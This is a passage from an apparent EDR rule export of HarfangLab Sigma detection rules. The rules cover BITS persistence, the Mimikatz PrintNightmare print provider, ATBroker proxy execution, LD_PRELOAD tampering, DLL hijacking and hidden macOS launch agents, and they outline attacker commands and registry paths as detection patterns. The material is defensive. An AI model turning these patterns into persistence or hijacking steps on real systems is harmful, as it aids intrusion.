"creation_date": "2026-03-23T11:45:34.081337Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081342Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
"https://docs.microsoft.com/windows/win32/bits/about-bits",
"https://attack.mitre.org/techniques/T1197/",
"https://attack.mitre.org/software/S0190/"
],
"name": "t1197_bitsadmin_persistence.yml",
"content": "title: Persistence or Code Execution via BITS\nid: d84087b2-ec87-4a75-abe6-badf1ee886d4\ndescription: |\n Detects a suspicious attempt to maintain persistence or execute code using bitsadmin.\n Bitsadmin is a tool to manage the Background Intelligent Transfer Service (BITS) which is used to download files from or upload files to HTTP web servers and SMB file shares.\n This service is an asynchronous file transfer mechanism and it's often used by attackers to download malicious files, exfiltrate data or maintain persistence.\n By default, BITS jobs have a 90 days maximum lifetime if complete or cancel method are not called.\n It is recommended to check the legitimacy of this action and the source (for downloading)/destination (for uploading) machine.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/\n - https://docs.microsoft.com/windows/win32/bits/about-bits\n - https://attack.mitre.org/techniques/T1197/\n - https://attack.mitre.org/software/S0190/\ndate: 2021/05/10\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.defense_evasion\n - attack.t1197\n - attack.s0190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Bitsadmin\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # bitsadmin /create \n # bitsadmin /addfile \n # bitsadmin /SetNotifyCmdLine [program_parameters]\n # bitsadmin /resume \n selection_binary:\n - Image|endswith: '\\bitsadmin.exe'\n - OriginalFileName: 'bitsadmin.exe'\n\n selection_persistence:\n CommandLine|contains: 'SetNotifyCmdLine'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d84087b2-ec87-4a75-abe6-badf1ee886d4",
"rule_name": "Persistence or Code Execution via BITS",
"rule_description": "Detects a suspicious attempt to maintain persistence or execute code using bitsadmin.\nBitsadmin is a tool to manage the Background Intelligent Transfer Service (BITS) which is used to download files from or upload files to HTTP web servers and SMB file shares.\nThis service is an asynchronous file transfer mechanism and it's often used by attackers to download malicious files, exfiltrate data or maintain persistence.\nBy default, BITS jobs have a 90-day maximum lifetime if the complete or cancel method is not called.\nIt is recommended to check the legitimacy of this action and the source (for downloading)/destination (for uploading) machine.\n",
"rule_creation_date": "2021-05-10",
"rule_modified_date": "2025-02-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1197"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d844ae3d-4e16-4374-947d-6f17eb0a954d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595280Z",
"creation_date": "2026-03-23T11:45:34.595283Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595291Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675",
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675"
],
"name": "t1574_spoolsv_new_mimikatz_provider.yml",
"content": "title: Mimikatz Print Provider Added\nid: d844ae3d-4e16-4374-947d-6f17eb0a954d\ndescription: |\n Detects the installation of a new print provider by running mimikatz's PrintNightmare implementation.\n Attackers can install a new print provider as part of CVE-2021-1675 to gain code execution in spoolsv.\n It is recommended to isolate the infected host and to look for attacker activities on other hosts.\nreferences:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675\ndate: 2021/07/06\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1574\n - attack.s0002\n - cve.2021-1675\n - classification.Windows.Source.Registry\n - classification.Windows.Exploit.CVE-2021-1675\n - classification.Windows.Exploit.PrintNightmare\n - classification.Windows.HackTool.Mimikatz\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n Image|endswith: '\\spoolsv.exe'\n # spoolsv AddNewProvider function is in charge of writting it.\n # HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\mimikatz-{438047e2-911d-4073-9be6-be3530c13385}-reallylegitprinter\\Configuration File\n TargetObject:\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows *\\Drivers\\Version-?\\mimikatz-{????????-????-????-????-????????????}-reallylegitprinter\\Configuration File'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows *\\Drivers\\Version-?\\{????????-????-????-????-????????????}-legitprinter\\Configuration File'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows *\\Drivers\\Version-?\\mimikatz-{????????-????-????-????-????????????}-legitprinter\\Configuration File'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows *\\Drivers\\Version-?\\QMS 
810\\Configuration File'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d844ae3d-4e16-4374-947d-6f17eb0a954d",
"rule_name": "Mimikatz Print Provider Added",
"rule_description": "Detects the installation of a new print provider by running mimikatz's PrintNightmare implementation.\nAttackers can install a new print provider as part of CVE-2021-1675 to gain code execution in spoolsv.\nIt is recommended to isolate the infected host and to look for attacker activities on other hosts.\n",
"rule_creation_date": "2021-07-06",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1574"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d852030e-a4ef-4fb4-91dc-a59d99d90b3f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080405Z",
"creation_date": "2026-03-23T11:45:34.080407Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080411Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Atbroker/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_atbroker.yml",
"content": "title: Suspicious Process Launched by ATBroker\nid: d852030e-a4ef-4fb4-91dc-a59d99d90b3f\ndescription: |\n Detects a suspicious process execution by ATBroker.exe, possibly to proxy execution of malicious code.\n ATBroker executes code defined in registry for a new Assistive Technology (AT). Modifications must be made to the system registry to either register or modify an existing AT service entry.\n Attackers can use this technique to execute malicious code through Microsoft-signed binaries.\n It is recommended to investigate the parent process for suspicious activities as well as to look for subsequent malicious actions stemming from the AtBroker process.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Atbroker/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/12/04\nmodified: 2025/09/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Atbroker\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessParentOriginalFileName: 'ATBroker.exe'\n ParentCommandLine|contains: ' ?start '\n\n filter_legitimate_context:\n Ancestors|contains:\n - '?:\\Windows\\System32\\AtBroker.exe|?:\\Windows\\System32\\winlogon.exe'\n - '?:\\Windows\\System32\\Utilman.exe|?:\\Windows\\System32\\winlogon.exe'\n\n filter_legitimate_signature:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n - 'NV Access Limited'\n - 'AI Squared'\n - 'Freedom Scientific Inc'\n - 'Freedom Scientific Inc.'\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d852030e-a4ef-4fb4-91dc-a59d99d90b3f",
"rule_name": "Suspicious Process Launched by ATBroker",
"rule_description": "Detects a suspicious process execution by ATBroker.exe, possibly to proxy execution of malicious code.\nATBroker executes code defined in registry for a new Assistive Technology (AT). Modifications must be made to the system registry to either register or modify an existing AT service entry.\nAttackers can use this technique to execute malicious code through Microsoft-signed binaries.\nIt is recommended to investigate the parent process for suspicious activities as well as to look for subsequent malicious actions stemming from the AtBroker process.\n",
"rule_creation_date": "2022-12-04",
"rule_modified_date": "2025-09-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d8794f80-f5c3-4bdf-ac3f-ce861e55131c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611832Z",
"creation_date": "2026-03-23T11:45:34.611836Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611843Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://tbhaxor.com/exploiting-shared-library-misconfigurations/",
"https://github.com/gianlucaborello/libprocesshider",
"https://sysdig.com/blog/hiding-linux-processes-for-fun-and-profit/",
"https://attack.mitre.org/techniques/T1574/006/"
],
"name": "t1574_006_ld_preload_modified.yml",
"content": "title: Dynamic Linker Preload Configuration Modified\nid: d8794f80-f5c3-4bdf-ac3f-ce861e55131c\ndescription: |\n Detects an attempt to modify the preload configuration of the dynamic linker.\n The modification of this configuration can be an attempt to conceal malicious activity or monitor existing processes.\n It is recommended to analyze the execution context to determine if the process has a legitimate reason to modify this file and to download the modify file via a job to ensure the new content is not malicious.\nreferences:\n - https://tbhaxor.com/exploiting-shared-library-misconfigurations/\n - https://github.com/gianlucaborello/libprocesshider\n - https://sysdig.com/blog/hiding-linux-processes-for-fun-and-profit/\n - https://attack.mitre.org/techniques/T1574/006/\ndate: 2022/11/10\nmodified: 2025/10/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1574.006\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.SystemModification\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path: '/etc/ld.so.preload'\n - TargetPath: '/etc/ld.so.preload'\n\n filter_read:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* 
/bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n\n exclusion_dynatrace:\n - ProcessImage: '/*/dynatrace*/agent/lib64/oneagentinstallaction'\n - ProcessCommandLine|startswith:\n - '/bin/sh /var/lib/dynatrace/oneagent/agent/downloads/dynatrace-oneagent-linux-'\n - '/bin/sh /opt/dynatrace/oneagent/agent/'\n\n exclusion_docker:\n ProcessImage: '/usr/bin/dockerd'\n\n exclusion_snap:\n ProcessImage: '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d8794f80-f5c3-4bdf-ac3f-ce861e55131c",
"rule_name": "Dynamic Linker Preload Configuration Modified",
"rule_description": "Detects an attempt to modify the preload configuration of the dynamic linker.\nThe modification of this configuration can be an attempt to conceal malicious activity or monitor existing processes.\nIt is recommended to analyze the execution context to determine if the process has a legitimate reason to modify this file and to download the modified file via a job to ensure the new content is not malicious.\n",
"rule_creation_date": "2022-11-10",
"rule_modified_date": "2025-10-16",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1574.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d8bc39d8-82f2-4be6-90df-fc4d6fd12973",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.616986Z",
"creation_date": "2026-03-23T11:45:34.616990Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.616997Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/labs/new-macos-malware-xcodespy-targets-xcode-developers-with-eggshell-backdoor/",
"https://attack.mitre.org/techniques/T1036/005/"
],
"name": "t1036_004_susp_executable_masquerading.yml",
"content": "title: Suspicious Executable Masquerading Known Editor Name\nid: d8bc39d8-82f2-4be6-90df-fc4d6fd12973\ndescription: |\n Detects the execution of a process impersonating a known distributor.\n Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them in order to bypass simple security controls.\n It is recommended to check for malicious activities by the newly created process.\nreferences:\n - https://www.sentinelone.com/labs/new-macos-malware-xcodespy-targets-xcode-developers-with-eggshell-backdoor/\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2024/09/26\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.Masquerading\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_name:\n ProcessName:\n - 'com.apple.*'\n - 'us.zoom.*'\n - 'com.docker.*'\n - 'Discord'\n - 'hurukai'\n\n selection_signature:\n - ProcessSigned: 'false'\n - ProcessSigned: 'true'\n ProcessCodesigningFlagsStr|contains: 'CS_ADHOC'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d8bc39d8-82f2-4be6-90df-fc4d6fd12973",
"rule_name": "Suspicious Executable Masquerading Known Editor Name",
"rule_description": "Detects the execution of a process impersonating a known distributor.\nAdversaries may match or approximate the name or location of legitimate files or resources when naming/placing them in order to bypass simple security controls.\nIt is recommended to check for malicious activities by the newly created process.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2025-01-27",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d92166e2-cf11-4553-856e-29559fdb0fe2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082607Z",
"creation_date": "2026-03-23T11:45:34.082609Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082613Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_pathping.yml",
"content": "title: DLL Hijacking via pathping.exe\nid: d92166e2-cf11-4553-856e-29559fdb0fe2\ndescription: |\n Detects potential Windows DLL Hijacking via pathping.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'pathping.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\IPHLPAPI.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d92166e2-cf11-4553-856e-29559fdb0fe2",
"rule_name": "DLL Hijacking via pathping.exe",
"rule_description": "Detects potential Windows DLL Hijacking via pathping.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d93e4f16-7bd8-4bf7-a2fc-5a659ed10bf2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.614531Z",
"creation_date": "2026-03-23T11:45:34.614535Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.614542Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/001/",
"https://attack.mitre.org/techniques/T1564/001/"
],
"name": "t1543_001_launch_agents_hidden.yml",
"content": "title: Hidden Launch Agents Created\nid: d93e4f16-7bd8-4bf7-a2fc-5a659ed10bf2\ndescription: |\n Detects the creation of an hidden launch agent file.\n Adversaries may create hidden files in order to avoid detection from users.\n It is recommended to check the process creating the file for other suspicious behaviors and that the content of the newly created file is legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1543/001/\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2024/04/30\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1543.001\n - attack.defense_evasion\n - attack.t1564.001\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_path:\n - Path|contains:\n - '/System/Library/LaunchAgents/'\n - '/Library/LaunchAgents/'\n - TargetPath|contains:\n - '/System/Library/LaunchAgents/'\n - '/Library/LaunchAgents/'\n selection_kind:\n Kind:\n - 'create'\n - 'rename'\n ProcessImage|contains: '?'\n\n selection_hidden:\n - Path|re: '.*/\\.[^/]*$'\n - TargetPath|re: '.*/\\.[^/]*$'\n\n filter_nosync: # SIP related file\n - Path|endswith: '/.dat.nosync*.??????'\n - TargetPath|endswith: '/.dat.nosync*.??????'\n\n exclusion_bomgar:\n Path: '/Library/LaunchDaemons/.com.bomgar.bomgar-ps-*.helper/run.state'\n\n exclusion_temp_file:\n - Image: '/usr/bin/vim'\n Path|endswith:\n - '.swp'\n - '.swx'\n - Image: '/usr/bin/ditto'\n Path|endswith: '/.BC.?_*'\n - Image: '/usr/bin/ditto'\n TargetPath|endswith: '/.BC.?_*'\n\n exclusion_finder:\n Image: '/System/Library/CoreServices/Finder.app/Contents/MacOS/Finder'\n Path|endswith: '.DS_Store'\n\n exclusion_rsync:\n Image: '/usr/bin/rsync'\n\n exclusion_sed:\n # /private/var/root/Library/LaunchAgents/.!78671!com.f5.f5vpnhelper.plist\n - Path|endswith: '/.!?????!*.plist'\n 
Image: '/usr/bin/sed'\n - TargetPath|endswith: '/.!?????!*.plist'\n Image: '/usr/bin/sed'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d93e4f16-7bd8-4bf7-a2fc-5a659ed10bf2",
"rule_name": "Hidden Launch Agents Created",
"rule_description": "Detects the creation of a hidden launch agent file.\nAdversaries may create hidden files in order to avoid detection from users.\nIt is recommended to check the process creating the file for other suspicious behaviors and that the content of the newly created file is legitimate.\n",
"rule_creation_date": "2024-04-30",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1543.001",
"attack.t1564.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d956a4b6-4d5e-445a-9d2e-65dfe014661d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096630Z",
"creation_date": "2026-03-23T11:45:34.096632Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096637Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msdt.yml",
